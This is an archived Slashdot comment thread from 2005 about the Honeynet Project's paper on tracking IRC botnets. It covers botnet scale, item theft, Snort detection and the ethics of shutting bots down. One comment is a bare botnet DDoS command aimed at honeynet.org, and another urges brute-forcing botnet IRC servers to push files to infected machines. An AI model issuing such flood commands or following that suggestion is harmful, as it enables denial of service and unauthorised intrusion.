Become a fan of Slashdot on Facebook

 



Forgot your password?
typodupeerror
×
Security

Observing Botnets with Honeynets 118

Susan Saradon writes "The Honeynet Project has released a new paper which deals with the observation of botnets. "Know Your Enemy: Tracking Botnets" discusses what Botnets are, who is using them, how, and why. It als introduces the tools "mwcollect" and "drone" which can be used for collecting an tracking Botnet activity. Nice to read and looking forward to the release of these tools."
This discussion has been archived. No new comments can be posted.

Observing Botnets with Honeynets

Comments Filter:
  • by Enigma_Man ( 756516 ) on Tuesday March 15, 2005 @09:40AM (#11942966) Homepage
    logging into the IRC channels of botnets, and trying to introduce myself, and asking "a/s/l" and getting all huffy that nobody's answering. Or talking like a robot.

    -Jesse
  • by maotx ( 765127 ) <maotx@yCOWahoo.com minus herbivore> on Tuesday March 15, 2005 @09:42AM (#11942978)
    While I was going to submit this as a story, it would seem more appropriate as a link from this one.

    News.com [com.com] has an interesting article [com.com] talking about how bot nets have migrated mainly from DoS to wide-spread spys. A growing increase in bot nets have been used to gather sensitive identity information and install adware and spyware. The Honeynet Project [honeynet.org] estimates that some of the networks are made up of more than 50,000 computers.
  • by bigtallmofo ( 695287 ) on Tuesday March 15, 2005 @09:48AM (#11943020)
    During these few months, we saw 226,585 unique IP addresses joining at least one of the channels we monitored [...] This shows that the threat posed by botnets is probably worse than originally believed

    Doesn't this qualify as the understatement of the year? Never in my wildest dreams did I think a botnet would grow above a few tens of thousands hosts. There's no explanation for such a botnet other than a professional full-time organization specifically created for profit.

    Anyway, I couldn't have imagined a better or more authoritative write-up of botnets. Hopefully though it doesn't add fuel to the various ??AA organization's fire of declaring IRC a scourge on humanity.
    • by LiquidCoooled ( 634315 ) on Tuesday March 15, 2005 @10:11AM (#11943164) Homepage Journal
      No, here at work, we just have to sneeze loudly and we get a new IP.

      Windows machines reboot continuously because they keep crashing mean new IPs are allocated every time the user reconnects to his ISP.
    • its a worrying figure yes, but at least part of that is likely to be from dynamic ip hosts: the dialup people and so on
    • There's no explanation for such a botnet other than a professional full-time organization specifically created for profit.

      Yes, there is, a lot of DDOS power. A lot of xdcc bots. Script kiddies with zero skills can pull it off.

      Hopefully though it doesn't add fuel to the various ??AA organization's fire of declaring IRC a scourge on humanity.

      Just because botnets use irc networks as a place of gathering does not mean IRC is a scourage on humanity. ??AA are not even worried about such things, there
      • "Script kiddies with zero skills can pull it off"

        Totally agree, but you have to admit that someone with 50,000 +/- bots available to them is a dangerous person.

        Side question, where is the quote in your sig from?
        • Agreed. I don't care if you are a script kiddie; if you get a botnet that big, then you command my respect -- not because of technical skills, but the amount of computing capital that you have, and the power that you can wield on the internet with it. Now, that is not to say that you may know how to use it, but you could still sell that bot net to someone else.
    • by Anonymous Coward
      Note that "unique IP adresses" also includes those of infected computers that reconnected during the the period the channels were monitored - assigning new IPs on a reconnect is very popular not only with modem / ISDN, but even with DSL ISPs.
      Some ISPs even assign a new IP every 12 or 24 hours, meaning that even if only a small part of that botnet was made up of nodes on a connection like that, they'd have a significant influence on the number of "unique IP adresses".
    • Hopefully though it doesn't add fuel to the various ??AA organization's fire of declaring IRC a scourge on humanity.

      I hate to be the one to tell you this, but they have been for a while now. I poked my head in a few a while back, and..well, granted, it was early on a school night, but for being a supposed linux help channel, it was sure full of geek talking about tits. I hung around for close to 2 hours, and one guy even got yelled at for asking a question.
      • by Anonymous Coward
        Sounds like you came to our channel. I don't know about you, but when we get questions like "how do I install an irc server on my root?" we get pissed off. We get a half dozen people a day who try to use the l33t sk1llz on us that they picked up from #rohack, then curse at us in gibberish when it doesn't work and we won't help them with it. Not to mention the hourly trolls and so on.

        Our channel has a policy. If you want someone to lead you gently by your dick, cry to your momma. If you've read ESR's Ho [catb.org]
    • by EnglishTim ( 9662 ) on Tuesday March 15, 2005 @10:26AM (#11943296)
      There's no explanation for such a botnet other than a professional full-time organization specifically created for profit.

      That... or the network has attained self-awareness and is trying to recruit all our PCs to conquer the world!

      THROW YOUR PC OUT OF THE WINDOW. IT'S THE ONLY WAY TO BE SURE.
    • While the most valuable bots are on always-on broadband connections, I expect many are on dial-up. Over a "few months" a PC connecting over dialup could use dozens of IPs. With a big ISP (big IP pool) and a user averaging more than one connection per day you could get >>100 IPs per bot over a few months.
    • by fm6 ( 162816 )

      Never in my wildest dreams did I think a botnet would grow above a few tens of thousands hosts.

      Lots of people did, though. Not botnets as such, but it's been clear for several years that Windows is extremely vulnerable to automated infiltration.

      There's no explanation for such a botnet other than a professional full-time organization specifically created for profit.

      A "professional full-time organization" can be one guy. But I'm guessing you mean something more serious, like somebody's raised some invest

    • As I understand it, that figure was all botnets they monitored combined.
      Not a single one.

      But as we all know, on the internet "size doesnt matter much".
      Switch your bots to a lightweight (UDP based?) protocol, partition up the botnet or make it P2P and you can handle any insane number of bots.

      Remember, as soon as a new Windows vulnerability is discovered (the current rate seems to be about one serious remote exploit every 3 months) your malicious botnet-operator only needs to "plug in" the new exploit and h
    • There's no explanation for such a botnet other than a professional full-time organization specifically created for profit.

      You're right. Criminals are making profit from botnets and they to for at least a year from now [heise.de].

    • If you're a university research project, it's fun to just look at all the action, but the obvious next step is to find something constructive to *do* with the information. One problem is LARTing the infected boxes, and a separate problem is tracking the zombie masters, and somewhere in between is tracking the IRC networks (which may be owned by the zombie masters or may be innocent.) Tracking the zombie masters, while important, is highly non-trivial for a competently run botnet, because the master hopef
  • by duffbeer703 ( 177751 ) * on Tuesday March 15, 2005 @09:54AM (#11943048)
    I'd love to use bot nets to spot, stop or even patch new/unknown machines on my network.
  • WTF? (Score:5, Funny)

    by Quixote ( 154172 ) * on Tuesday March 15, 2005 @09:59AM (#11943086) Homepage Journal
    FTFA:
    In one case, bot software detected whether the game "Diablo II" was installed on the host PC. If the game was present, the program would steal items from the player's characters and drop them at preplanned places in the online game world. The bot net's controller would then collect the items and sell them on auction site eBay, Holz said.

    What the... ? Stealing identities and installing viruses is one thing; but to actually go and steal stuff from Diablo-II?? Have these guys no shame???

    • Selling D2 items is more profitable than you might think...
    • Re:WTF? (Score:5, Interesting)

      by Reene ( 808293 ) on Tuesday March 15, 2005 @10:12AM (#11943175) Journal
      I would imagine it is much more profitable, at least in the short run, to do things like this. Same would be true for Everquest if it's possible to steal items in this manner, but I am unfamiliar with how exactly the item system in that game works (was always a Diablo fan, not a EQ fan).

      The prices some of these things fetch is insane even to the most hardcore of gamers..But I guess if you've got that much money to blow anything starts looking good. Hell, you should see some of the prices the shit on the text-based MUD DragonRealms [play.net] fetches. Upwards of thousands of dollars for characters, rare items, and currency. And it's easy to shell out anywhere from $30-$500 a month directly to the company that runs the game itself, nevermind the underground networks of illegal buying and selling of characters/items/money. But I digress...
      • With the exception of the EQ roleplay server, most high end items are no drop and can not be dropped or traded anyway. Tradeable high quality items however do exist and could fetch a fair price if a bot was able to transfer them assuming the item in question was not made no drop by use an augmentation. Most items like this are lore so any one character can only have one in his possesion at a time which would place limits on scaleablity. Coin can no longer be dropped in the game and has to be transfered d
  • detection of botnets (Score:5, Informative)

    by kc0re ( 739168 ) on Tuesday March 15, 2005 @10:04AM (#11943118) Journal
    For those of you that use Snort [snort.org] as an Intrustion Detection System, there are some excellent rules that will detect botnets located at BleedingSnort [bleedingsnort.com]

    Look for IRC rules that are non-standard ports. Very easy to run.
    • I never run IRC, so these hits are just makeing me laugh. I'm seeing SQLSlammer traffic as well. Network security is a great laugh.
    • Agreed. Snort is an excellent way to monitor botnets. But that's not the best part: The best part is shutting them down.

      Most people don't realize that the IRC server itself is being hosted on an infected zombie machine. (Think supernodes on P2P.) An email to that IP's abuse contact will often get the server shutdown quickly. Educational institutions are usually especially good about taking care of the problem.
      • Most people don't realize that the IRC server itself is being hosted on an infected zombie machine. (Think supernodes on P2P.) An email to that IP's abuse contact will often get the server shutdown quickly.

        That doesn't shut down the botnet. The operator simply picks a new "supernode", installs an irc server on it, and associates its IP number with the dynamic DNS name that's hardcoded into the bots.

        • You've got a good point. However, I've seen client fail to reestablish communication with a new server after the existing server is shut down. The transition isn't as easy as you describe all of the time.

  • Acting *and* Botnets. Damn!
  • by Necrotica ( 241109 ) <cspencer@lanlor d . ca> on Tuesday March 15, 2005 @10:08AM (#11943146)
    I'm an op in a large channel on the Undernet and spam is definately a growing problem. I see lots of spambots join/part our channel and an unusually high percentage of them come from Romania.

    You would think that the Undernet admins could simply force users to login to X, thus dramatically reducing the problem. However they are not willing to do that. As a sysadmin myself, never in a million years would I turn a blind eye one of my services being used completely inapporpriately and I would take the steps necessary to prevent it.
    • Set up an IRC server somewhere. The costs of a shell account are negligible and it's good fun to tinker around with.
    • At the risk of self promotion, some irc networks _do_ do something about it. Of AfterNET, any IP listen in sorbs, njabl, blitzed, or from romania etc must login to connect. This results in much less spam and an overall better signal to noise ratio.
  • For the folks who are planning to re-use those tools to analyze botnets, they should think again. The botnet "controller" usually DDoS the monitoring machine. They would also observe their bots for consistency. Moreover, they would keep changing the protocol making it difficult for people to construct clients to connect to those IRC channels.
  • by aug24 ( 38229 ) on Tuesday March 15, 2005 @10:13AM (#11943181) Homepage
    ...could one of you chaps out there with more time than me please brute-force the password to these IRC servers and update these bot machines with a file which throws up a popup saying "You have been hacked you idiot, get someone to help you secure this box (or I will steal your credit card details").

    J.

  • WTF? Am I the only one who thinks it's funny that so many of these bots are under the GPL - as if the criminals who use them will care about the finer points of copyright law. What idiots.
    • Maybe it's not so much that it's GPL'd, but that it can be hosted on sites like sourceforge. I'm not familiar with the terms of sourceforge, but I know of at least a few projects on sourceforge that are used to host botting programs for various online games.

      Why pay for a host when you can just have SF host it for you?
    • Am I the only one who thinks it's funny that so many of these bots are under the GPL - as if the criminals who use them will care about the finer points of copyright law.

      You are forgetting that many of the people involved are retarded. If you look on direct connection networks or even in Usenet groups where things like stolen fonts are traded you won't have to look long to find one fuckwit complaining that one of the archives of pirated material he/she/it put together has been "ripped off" by some other t

  • Spidering (Score:3, Interesting)

    by menace3society ( 768451 ) on Tuesday March 15, 2005 @10:30AM (#11943320)
    Does it bother anyone else that they imply that spidering is related to DDoS and botnets?

    Note that DDoS attacks are not limited to web servers, virtually any service available on the Internet can be the target of such an attack. Higher-level protocols can be used to increase the load even more effectively by using very specific attacks, such as running exhausting search queries on bulletin boards or recursive HTTP-floods on the victim's website. Recursive HTTP-flood means that the bots start from a given HTTP link and then follows all links on the provided website in a recursive way. This is also called spidering.

    Any time I see this sort of obvious attempt to build paranoia, it makes me suspicious of the whole article.

    • "Does it bother anyone else that they imply that spidering is related to DDoS and botnets? "

      When the bots are doing nothing but http requests and database requests on your site by doing search queries and following links, then yes that would be a DDoS attack.

      Any attack relating to damaging a service is a DDoS.

      much better then just DDoS attacking with a single domain with an HTTP request attack, there are a few reasons to doing it this way, my guess would be maybe its harder to notice by viewing your logs
      • The problem is that they imply that spidering is only ever used for DoS attacks, which patently isn't true. Unless, of course, you think that being linked to by Google is a DoS attack.
    • Yeah how ridiculous, everyone on Slashdot knows you can't do any harm with a sudden flood of HTTP requests from a million different IPs... oh wait...
    • Nope, what they describe *is* spidering. The difference between DDoS attacks and ligitimate spidering by search engines, etc is probably the "niceness". e.g, the delay between requests, respecting robots.txt, etc. Any implication "that spidering is related to DDoS and botnets" is all in your imagination. Go put your tinfoil hat back on bud.
  • When the bots become self aware, then it is time to worry.
  • by Anonymous Coward on Tuesday March 15, 2005 @11:56AM (#11944194)
    I found a gaobot variant at work a month back and ran it on a Virtual PC at home. One thing the article doesn't mention is that the variant would connect to a free dynamic IP address server (in my case *.ma.cx) to figure out the IP of the IRC server. I fired up mIRC, and joined the channel my bot was joining, and sent the OP a message. We started talking for a bit. At first he thought I was some other black hat and he started bragging about having over 50,000 machines in his network. Wanted to know if I wanted to trade bots and the like. When he figured out what I was really doing, he banned me.

    I sent messages to the ISP of the IRC server (in this case IPowerWeb) and to the dynamic DNS server to the effect of "Hey, someone's using your service for hacking" with all my details and such. Nothing happened. Guess they just don't care.
  • .ddos.syn honeynet.org 80 99999999999999999
  • At some point in the not-too-distant future, I forsee a disgruntled botnet operator (or an unethical sysadmin who's getting DDoSed) causing about 100,000 0wned home computers to spontaneously "deltree /y c:".

    At that point, we may see the average end-user become slightly more concerned about network security.

    In fact, I'm a little surprised it hasn't happened already.
    • I doubt this will happen (maybe by accident or some "failed" update, though).
      The botnet is so "useful", why should he intentionally wipe it out?

      My guess would be that we'll just be seeing more of the same. A lot more.
      Phishing will grow bigger as more clueless users get infected with keylogging bots that send their bank info home, the blackmailing crowd might move on to more high profile victims (ebay down for a day? 100k bots can do it) and the botnet/worm creators will ofcourse constantly get more creativ
  • We recently had a very unusual update run on one of our monitored botnets: Everything went fine, the botnet master authenticated successfully and issued the command to download and execute the new file. Our client drone downloaded the file and it got analyzed, we set up a client with the special crafted nickname, ident, and user info. But then our client could not connect to the IRC server to join the new channel. The first character of the nickname was invalid to use on that IRCd software. This way, the (s
  • If you're monitoring these 'bot nets, why not do something useful instead -- like delete the d@mn 'bot programs off the compromised machines instead!

    Oh, yeah, you'd be out of a job at that point once they were gone.

    • The whole purpouse was to gather evidence and details of the botnets. If you don't understand how the bots work, then it is hard to find how to defend against them. By knowing the targets, the goals and how they communicate you can both detect them on a network, and defend against them (for example, if you administer a corparate network, having the signitures of a bot with Snort can be quite useful in intercepting bot traffic). The other interesting thing was that the bot nets use IRC channels to communicat
      • The whole purpouse was to gather evidence and details of the botnets...The value of having this information is far more useful than deleting the bot off a computer.

        Of course you misunderstood my post completely, yet replied anyway.

        1: Find how the 'bots operate.
        2: Send the 'botnet instructions to patch the vulnerability if present, and self-delete immediately afterwards.

        Do not study them forever while they continue to wreak havoc on the rest of the Internet.

        Clear now?

    • The Honeynet Project is a research project - cleaning up infected users and squashing evildoers is more of an ISP problem. Research Projects aren't out of a job unless they run out of funding (or unless they solve all computer security problems and greedy/malicious people stop exploiting the net, but that ain't happening.)

      Letting the ISPs of the infected users know is a worthwhile activity; running a public blacklist of them might also be. It sounds like they complained to some of the IRC net operators,

  • I've noticed that a lot of online banking sites are now switching from typed passwords to "keypad" buttons that you have to click with a mouse. The order of the buttons changes every time the page is loaded, so sniffing the mouse position won't help. This seems like a good basic security measure and I'm a bit surprised it hasn't been universally adopted.

    Just wondering, from those who know about such things - Short of doing a realtime screen capture and sending the video of the mouse moving over the button

  • I have a wireless router which came with my DSL account, I used to use one of my own. Anyway, since I'm using a router with NAT translation (all the computers connected have 192.1.1.xxx addresses so outside traffic does not filter to them) only returning traffic will get through.

    I read that there are 4 service ports that get 80% of the zombie traffic in attempts to capture machines, so I decided to put port logging and discard on those 4 ports (195-197 and 443), and see what happened.

    Within ONE MINUTE of

  • I found this article to be very interesting, but noted the following section in the writeup;

    We use snort_inline for Data Control and replace all outgoing suspicious connections. A connection is suspicious if it contains typical IRC messages like " 332 ", " TOPIC ", " PRIVMSG " or " NOTICE ". Thus we are able to inhibit the bot from accepting valid commands from the master channel. It can therefore cause no harm to others - we have caught a bot inside our Honeynet.

    I'm wondering why the Botnet writers don

If entropy is increasing, where is it coming from?

Working...